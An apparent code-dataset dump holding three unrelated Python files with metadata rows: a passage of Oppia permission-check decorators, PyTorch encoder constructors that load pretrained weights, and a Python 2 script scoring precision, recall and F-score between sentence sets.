self.GET_HANDLER_ERROR_RETURN_TYPE)
return
subtopic_page = subtopic_page_services.get_subtopic_page_by_id(
topic.id, subtopic_id, strict=False)
if subtopic_page is None:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/revision' % (
classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
else:
return handler(self, topic.name, subtopic_id, **kwargs)
test_can_access.__wrapped__ = True
return test_can_access
def get_decorator_for_accepting_suggestion(decorator):
"""Function that takes a decorator as an argument and then applies some
common checks and then checks the permissions specified by the passed in
decorator.
Args:
decorator: function. The decorator to be used to verify permissions
for accepting/rejecting suggestions.
Returns:
function. The new decorator which includes all the permission checks for
accepting/rejecting suggestions. These permissions include:
- Admins can accept/reject any suggestion.
- Users with scores above threshold can accept/reject any suggestion
in that category.
- Any user with edit permissions to the target entity can
accept/reject suggestions for that entity.
"""
def generate_decorator_for_handler(handler):
"""Function that generates a decorator for a given handler.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that has common checks and
permissions specified by passed in decorator.
Raises:
NotLoggedInException. The user is not logged in.
"""
def test_can_accept_suggestion(
self, target_id, suggestion_id, **kwargs):
"""Returns a (possibly-decorated) handler to test whether a
suggestion can be accepted based on the user actions and roles.
Args:
target_id: str. The target id.
suggestion_id: str. The suggestion id.
**kwargs: *. Keyword arguments.
Returns:
function. The (possibly-decorated) handler for accepting a
suggestion.
Raises:
NotLoggedInException. The user is not logged in.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions = user_services.get_user_actions_info(
self.user_id
).actions
if role_services.ACTION_ACCEPT_ANY_SUGGESTION in user_actions:
return handler(self, target_id, suggestion_id, **kwargs)
if len(suggestion_id.split('.')) != 3:
raise self.InvalidInputException(
'Invalid format for suggestion_id.'
' It must contain 3 parts separated by \'.\'')
suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
if suggestion is None:
raise self.PageNotFoundException
# TODO(#6671): Currently, the can_user_review_category is
# not in use as the suggestion scoring system is not enabled.
# Remove this check once the new scoring structure gets implemented.
if suggestion_services.can_user_review_category(
self.user_id, suggestion.score_category):
return handler(self, target_id, suggestion_id, **kwargs)
if suggestion.suggestion_type == (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
if user_services.can_review_translation_suggestions(
self.user_id,
language_code=suggestion.change.language_code):
return handler(self, target_id, suggestion_id, **kwargs)
elif suggestion.suggestion_type == (
feconf.SUGGESTION_TYPE_ADD_QUESTION):
if user_services.can_review_question_suggestions(self.user_id):
return handler(self, target_id, suggestion_id, **kwargs)
return decorator(handler)(self, target_id, suggestion_id, **kwargs)
test_can_accept_suggestion.__wrapped__ = True
return test_can_accept_suggestion
return generate_decorator_for_handler
def can_view_reviewable_suggestions(handler):
"""Decorator to check whether user can view the list of suggestions that
they are allowed to review.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can view reviewable suggestions.
"""
def test_can_view_reviewable_suggestions(
self, target_type, suggestion_type, **kwargs):
"""Checks whether the user can view reviewable suggestions.
Args:
target_type: str. The entity type of the target of the suggestion.
suggestion_type: str. The type of the suggestion.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if suggestion_type == (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
if user_services.can_review_translation_suggestions(self.user_id):
return handler(self, target_type, suggestion_type, **kwargs)
elif suggestion_type == (
feconf.SUGGESTION_TYPE_ADD_QUESTION):
if user_services.can_review_question_suggestions(self.user_id):
return handler(self, target_type, suggestion_type, **kwargs)
else:
raise self.PageNotFoundException
test_can_view_reviewable_suggestions.__wrapped__ = True
return test_can_view_reviewable_suggestions
def can_edit_entity(handler):
"""Decorator to check whether user can edit entity.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can edit the entity.
"""
def test_can_edit_entity(self, entity_type, entity_id, **kwargs):
"""Checks if the user can edit entity.
Args:
entity_type: str. The type of entity i.e. exploration, question etc.
entity_id: str. The ID of the entity.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
arg_swapped_handler = lambda x, y, z: handler(y, x, z)
# This swaps the first two arguments (self and entity_type), so
# that functools.partial can then be applied to the leftmost one to
# create a modified handler function that has the correct signature
# for the corresponding decorators.
reduced_handler = functools.partial(
arg_swapped_handler, entity_type)
if entity_type == feconf.ENTITY_TYPE_EXPLORATION:
return can_edit_exploration(reduced_handler)(
self, entity_id, **kwargs)
elif entity_type == feconf.ENTITY_TYPE_QUESTION:
return can_edit_question(reduced_handler)(self, entity_id, **kwargs)
elif entity_type == feconf.ENTITY_TYPE_TOPIC:
return can_edit_topic(reduced_handler)(self, entity_id, **kwargs)
elif entity_type == feconf.ENTITY_TYPE_SKILL:
return can_edit_skill(reduced_handler)(self, entity_id, **kwargs)
elif entity_type == feconf.ENTITY_TYPE_STORY:
return can_edit_story(reduced_handler)(self, entity_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_edit_entity.__wrapped__ = True
return test_can_edit_entity
def can_play_entity(handler):
"""Decorator to check whether user can play entity.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can play the entity.
"""
def test_can_play_entity(self, entity_type, entity_id, **kwargs):
"""Checks if the user can play entity.
Args:
entity_type: str. The type of entity i.e. exploration, question etc.
entity_id: str. The ID of the entity.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
arg_swapped_handler = lambda x, y, z: handler(y, x, z)
if entity_type == feconf.ENTITY_TYPE_EXPLORATION:
# This swaps the first two arguments (self and entity_type), so
# that functools.partial can then be applied to the leftmost one to
# create a modified handler function that has the correct signature
# for can_edit_question().
reduced_handler = functools.partial(
arg_swapped_handler, feconf.ENTITY_TYPE_EXPLORATION)
# This raises an error if the question checks fail.
return can_play_exploration(reduced_handler)(
self, entity_id, **kwargs)
elif entity_type == feconf.ENTITY_TYPE_QUESTION:
reduced_handler = functools.partial(
arg_swapped_handler, feconf.ENTITY_TYPE_QUESTION)
return can_play_question(reduced_handler)(
self, entity_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_play_entity.__wrapped__ = True
return test_can_play_entity
def is_from_oppia_ml(handler):
"""Decorator to check whether the incoming request is from a valid Oppia-ML
VM instance.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now can check if incoming
request is from a valid VM instance.
"""
def test_request_originates_from_valid_oppia_ml_instance(self, **kwargs):
"""Checks if the incoming request is from a valid Oppia-ML VM
instance.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. If incoming request is not from a valid
Oppia-ML VM instance.
"""
oppia_ml_auth_info = (
self.extract_request_message_vm_id_and_signature())
if (oppia_ml_auth_info.vm_id == feconf.DEFAULT_VM_ID and
not constants.DEV_MODE):
raise self.UnauthorizedUserException
if not classifier_services.verify_signature(oppia_ml_auth_info):
raise self.UnauthorizedUserException
return handler(self, **kwargs)
test_request_originates_from_valid_oppia_ml_instance.__wrapped__ = True
return test_request_originates_from_valid_oppia_ml_instance
def can_update_suggestion(handler):
"""Decorator to check whether the current user can update suggestions.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can update a given suggestion.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
edit this suggestion.
InvalidInputException. The submitted suggestion id is not valid.
PageNotFoundException. A suggestion is not found with the given
suggestion id.
"""
def test_can_update_suggestion(
self, suggestion_id, **kwargs):
"""Returns a handler to test whether a suggestion can be updated based
on the user's roles.
Args:
suggestion_id: str. The suggestion id.
**kwargs: *. Keyword arguments.
Returns:
function. The handler for updating a suggestion.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
edit this suggestion.
InvalidInputException. The submitted suggestion id is not valid.
PageNotFoundException. A suggestion is not found with the given
suggestion id.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions = self.user.actions
if len(suggestion_id.split('.')) != 3:
raise self.InvalidInputException(
'Invalid format for suggestion_id.' +
' It must contain 3 parts separated by \'.\'')
suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
if suggestion is None:
raise self.PageNotFoundException
if role_services.ACTION_ACCEPT_ANY_SUGGESTION in user_actions:
return handler(self, suggestion_id, **kwargs)
if suggestion.author_id == self.user_id:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You are not allowed to update suggestions that you created.')
if suggestion.suggestion_type not in (
feconf.CONTRIBUTOR_DASHBOARD_SUGGESTION_TYPES):
raise self.InvalidInputException('Invalid suggestion type.')
if suggestion.suggestion_type == (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
if user_services.can_review_translation_suggestions(
self.user_id,
language_code=suggestion.change.language_code):
return handler(self, suggestion_id, **kwargs)
elif suggestion.suggestion_type == (
feconf.SUGGESTION_TYPE_ADD_QUESTION):
if user_services.can_review_question_suggestions(self.user_id):
return handler(self, suggestion_id, **kwargs)
raise base.UserFacingExceptions.UnauthorizedUserException(
'You are not allowed to update the suggestion.')
test_can_update_suggestion.__wrapped__ = True
return test_can_update_suggestion
| 34.128936 | 80 | 0.647751 | 11,873 | 102,967 | 5.411606 | 0.036132 | 0.023423 | 0.014941 | 0.017276 | 0.868969 | 0.826931 | 0.779602 | 0.753253 | 0.724476 | 0.691527 | 0 | 0.000234 | 0.294269 | 102,967 | 3,016 | 81 | 34.140252 | 0.883964 | 0.405334 | 0 | 0.585185 | 0 | 0 | 0.058031 | 0.002016 | 0 | 0 | 0 | 0.000332 | 0 | 1 | 0.122222 | false | 0 | 0.021296 | 0 | 0.287963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a31f04621a88c37047eba0b1f3138090e220e3f | 7,116 | py | Python | models/encoders.py | romavlasov/idrnd-anti-spoofing-challenge | db35ceb50bfa173cabf651b6ac3a13894d6e34d5 | [
"MIT"
] | 10 | 2019-08-22T04:36:36.000Z | 2022-02-07T13:11:36.000Z | models/encoders.py | romavlasov/idrnd-anti-spoofing-challenge | db35ceb50bfa173cabf651b6ac3a13894d6e34d5 | [
"MIT"
] | 8 | 2019-08-19T10:17:06.000Z | 2020-10-29T12:58:40.000Z | models/encoders.py | romavlasov/idrnd-anti-spoofing-challenge | db35ceb50bfa173cabf651b6ac3a13894d6e34d5 | [
"MIT"
] | 5 | 2019-08-09T08:17:54.000Z | 2021-09-22T01:45:38.000Z | import re
import torch
import torch.nn as nn
from torch.utils import model_zoo
from models.backbones.mobilenet import MobileNet
from models.backbones.resnet import ResNet
from models.backbones.resnet import BasicBlock
from models.backbones.resnet import Bottleneck
from models.backbones.senet import SENet
from models.backbones.senet import SEBottleneck
from models.backbones.senet import SEResNetBottleneck
from models.backbones.senet import SEResNeXtBottleneck
from models.backbones.densenet import DenseNet
from models.blocks import build_layers
def mobilenet(device='cpu', *argv, **kwargs):
model = MobileNet(*argv, **kwargs)
return model.to(device)
def resnet18(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet18-5c106cde.pth'))
model.fc = nn.Linear(model.fc.in_features, out_features)
return model.to(device)
def resnet34(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet34-333f7ec4.pth'))
model.fc = nn.Linear(model.fc.in_features, out_features)
return model.to(device)
def resnet50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet50-19c8e357.pth'))
model.fc = nn.Linear(model.fc.in_features, out_features)
return model.to(device)
def resnet101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet101-5d3b4d8f.pth'))
model.fc = nn.Linear(model.fc.in_features, out_features)
return model.to(device)
def resnet152(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet152-b121ed2d.pth'))
model.fc = nn.Linear(model.fc.in_features, out_features)
return model.to(device)
def resnext50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth'))
model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
return model.to(device)
def resnext101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth'))
model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
return model.to(device)
def senet154(device='cpu', *argv, **kwargs):
model = SENet(SEBottleneck, [3, 8, 36, 3], groups=64, reduction=16,
**kwargs)
return model.to(device)
def se_resnet50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = SENet(SEResNetBottleneck, [3, 4, 6, 3], groups=1, reduction=16,
inplanes=64, input_3x3=False,
downsample_kernel_size=1, downsample_padding=0,
**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnet50-ce0d4300.pth'))
model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
return model.to(device)
def se_resnet101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = SENet(SEResNetBottleneck, [3, 4, 23, 3], groups=1, reduction=16,
inplanes=64, input_3x3=False,
downsample_kernel_size=1, downsample_padding=0,
**kwargs)
return model.to(device)
def se_resnet152(device='cpu', *argv, **kwargs):
model = SENet(SEResNetBottleneck, [3, 8, 36, 3], groups=1, reduction=16,
inplanes=64, input_3x3=False,
downsample_kernel_size=1, downsample_padding=0,
**kwargs)
return model.to(device)
def se_resnext50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = SENet(SEResNeXtBottleneck, [3, 4, 6, 3], groups=32, reduction=16,
inplanes=64, input_3x3=False,
downsample_kernel_size=1, downsample_padding=0,
**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnext50_32x4d-a260b3a4.pth'))
model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
return model.to(device)
def se_resnext101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = SENet(SEResNeXtBottleneck, [3, 4, 23, 3], groups=32, reduction=16,
inplanes=64, input_3x3=False,
downsample_kernel_size=1, downsample_padding=0,
**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnext101_32x4d-3b2fe3d8.pth'))
model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
return model.to(device)
def densenet121(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = DenseNet(32, (6, 12, 24, 16), 64, **kwargs)
if pretrained:
_load_densenet(model, 'https://download.pytorch.org/models/densenet121-a639ec97.pth')
#model.features.add_module('final', build_layers(1024))
model.classifier = nn.Linear(model.classifier.in_features, out_features)
return model.to(device)
def densenet201(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
model = DenseNet(32, (6, 12, 48, 32), 64, **kwargs)
if pretrained:
_load_densenet(model, 'https://download.pytorch.org/models/densenet201-c1103571.pth')
model.classifier = nn.Linear(model.classifier.in_features, out_features)
return model.to(device)
def _load_densenet(model, model_url):
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_url)
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict) | 38.885246 | 129 | 0.687886 | 953 | 7,116 | 4.980063 | 0.13851 | 0.057944 | 0.043826 | 0.064054 | 0.807627 | 0.753477 | 0.726296 | 0.719975 | 0.719975 | 0.719975 | 0 | 0.051348 | 0.176223 | 7,116 | 183 | 130 | 38.885246 | 0.758274 | 0.007589 | 0 | 0.48062 | 0 | 0.007752 | 0.132824 | 0.013169 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131783 | false | 0 | 0.108527 | 0 | 0.364341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a39b861d0916abb8094572915d19be1260b1137 | 7,990 | py | Python | data/setAnalysis.py | iesus/systematicity-sentence-production | f281d3642cea2cb342cdaeccfb0d9a0fb643ebc7 | [
"BSD-3-Clause"
] | null | null | null | data/setAnalysis.py | iesus/systematicity-sentence-production | f281d3642cea2cb342cdaeccfb0d9a0fb643ebc7 | [
"BSD-3-Clause"
] | null | null | null | data/setAnalysis.py | iesus/systematicity-sentence-production | f281d3642cea2cb342cdaeccfb0d9a0fb643ebc7 | [
"BSD-3-Clause"
] | null | null | null | '''
Created on Apr 22, 2016
@author: jesus
Methods to evaluate how the sentence set generated by the production model resembles the set that is related to each DSS
'''
def indicesToWords(indices,indexWordMapping):
return [indexWordMapping[index] for index in indices]
#precision=correctpredictions/allretrieved
def getPrecision(sizeCorrectPredictionsSet,sizeRetrievedSet):
if sizeRetrievedSet==0:return 0
else:
return sizeCorrectPredictionsSet*1.0/sizeRetrievedSet
#recall=correctpredictions/allexpected
def getRecall(sizeCorrectPredictionsSet,sizeExpectedSet):
return sizeCorrectPredictionsSet*1.0/sizeExpectedSet
#fscore=2*precision*recall/(precision+recall)
def getFScore(precision,recall):
if precision+recall==0:return 0
else:
return 2.0*(precision*recall)/(precision+recall)
def precisionRecallFScore(expectedSet,retrievedSet):
sizeExpectedSet=len(expectedSet)
sizeRetrievedSet=len(retrievedSet)
#Find the overlap of the sets (correct predictions)
copyExpectedSet=expectedSet[:]
copyRetrievedSet=retrievedSet[:]
for elem1 in copyExpectedSet[:]:
for elem2 in copyRetrievedSet:
if elem1==elem2:
copyExpectedSet.remove(elem1)
copyRetrievedSet.remove(elem2)
correctPredictions=sizeExpectedSet-len(copyExpectedSet)
recall=getRecall(correctPredictions, sizeExpectedSet)
precision=getPrecision(correctPredictions, sizeRetrievedSet)
fscore=getFScore(precision, recall)
return precision,recall,fscore
if __name__ == '__main__':
#set1=[[0, 16, 39, 40, 13, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 25, 42], [0, 16, 39, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 18, 25, 42], [0, 16, 5, 32, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 0, 15, 19, 35, 27, 42]]
#set2=[[0, 16, 5, 32, 40, 13, 1, 18, 25, 42], [0, 16, 39, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 25, 42]]
set1=[[9, 39, 40, 13, 1, 31, 42], [9, 39, 40, 13, 1, 14, 42], [9, 39, 40, 13, 19, 35, 34, 42], [9, 39, 40, 13, 1, 31, 25, 42], [9, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 25, 42], [9, 39, 40, 13, 1, 14, 19, 35, 34, 42], [9, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 39, 1, 31, 40, 13, 42], [9, 39, 1, 14, 40, 13, 42], [9, 5, 32, 40, 13, 1, 31, 42], [9, 5, 32, 40, 13, 1, 14, 42], [9, 5, 32, 40, 13, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 31, 25, 42], [9, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 32, 1, 31, 40, 13, 42], [9, 5, 32, 1, 14, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 31, 42], [9, 5, 0, 16, 40, 13, 1, 14, 42], [9, 5, 0, 16, 40, 13, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 25, 42], [9, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 0, 16, 1, 31, 40, 13, 42], [9, 5, 0, 16, 1, 14, 40, 13, 42], [35, 7, 39, 40, 13, 1, 31, 42], [35, 7, 39, 40, 13, 1, 14, 42], [35, 7, 39, 40, 13, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 25, 42], [35, 7, 39, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 25, 42], [35, 7, 39, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 1, 31, 40, 13, 42], [35, 7, 39, 1, 14, 40, 13, 42], [35, 7, 5, 32, 40, 13, 1, 31, 42], [35, 7, 5, 32, 40, 13, 1, 14, 42], [35, 7, 5, 32, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 14, 25, 42], [35, 7, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 32, 1, 31, 40, 13, 42], [35, 7, 5, 32, 1, 14, 40, 13, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 0, 16, 1, 31, 40, 13, 42], [35, 7, 5, 0, 16, 1, 14, 40, 13, 42]]
set2=[[35, 7, 5, 32, 40, 13, 1, 31, 42], [9, 5, 32, 40, 13, 1, 31, 42], [35, 7, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 14, 42], [9, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 42], [9, 5, 32, 1, 31, 40, 13, 42], [35, 7, 5, 32, 1, 31, 40, 13, 42], [9, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 31, 25, 42], [9, 5, 0, 16, 40, 13, 1, 31, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 25, 42], [9, 5, 32, 1, 14, 40, 13, 42], [9, 39, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 1, 14, 40, 13, 42], [9, 5, 32, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 1, 31, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 25, 42], [9, 39, 40, 13, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 42], [9, 39, 40, 13, 1, 31, 42], [9, 5, 0, 16, 1, 14, 40, 13, 42], [35, 7, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 42], [9, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 39, 1, 31, 40, 13, 42], [9, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 42], [35, 7, 39, 40, 13, 1, 31, 25, 42], [9, 39, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 39, 1, 14, 40, 13, 42], [9, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 0, 16, 1, 31, 40, 13, 42], [35, 7, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 1, 31, 40, 13, 42], [35, 7, 5, 0, 16, 1, 14, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 1, 14, 40, 13, 42], [35, 7, 39, 40, 13, 1, 14, 19, 35, 34, 42], [9, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 19, 35, 34, 42]]
#===========================================================================
# set1=[[9, 28, 38, 19, 35, 27, 42], [9, 28, 18, 38, 25, 42], [9, 28, 18, 38, 19, 35, 27, 42], [9, 28, 0, 15, 38, 19, 35, 27, 42], [35, 7, 28, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 25, 42], [35, 7, 28, 18, 38, 19, 35, 27, 42], [35, 7, 28, 0, 15, 38, 19, 35, 27, 42]]
# set2=[[35, 7, 28, 38, 19, 35, 27, 42], [9, 28, 0, 15, 38, 19, 35, 27, 42], [9, 28, 18, 38, 25, 42], [35, 7, 28, 0, 15, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 19, 35, 27, 42], [9, 28, 38, 19, 35, 27, 42], [9, 28, 18, 38, 19, 35, 27, 42], [35, 7, 28, 18, 38, 25, 42]]
#===========================================================================
wordLocalistMapPath='../data/dataFiles/map_localist_words.txt'
from loadFiles import getWordLocalistMap
mapIndexWord=getWordLocalistMap(wordLocalistMapPath)
print [indicesToWords(indices,mapIndexWord) for indices in set1]
print [indicesToWords(indices,mapIndexWord) for indices in set2]
print len(set1)
print len(set2)
precision,recall,fscore=precisionRecallFScore(set1,set2)
print precision
print recall
print fscore | 102.435897 | 2,301 | 0.508385 | 1,657 | 7,990 | 2.445383 | 0.060954 | 0.131293 | 0.11846 | 0.088845 | 0.664116 | 0.636969 | 0.636969 | 0.61229 | 0.605133 | 0.598717 | 0 | 0.41024 | 0.232416 | 7,990 | 78 | 2,302 | 102.435897 | 0.250448 | 0.193742 | 0 | 0.04878 | 1 | 0 | 0.007663 | 0.006386 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02439 | null | null | 0.170732 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
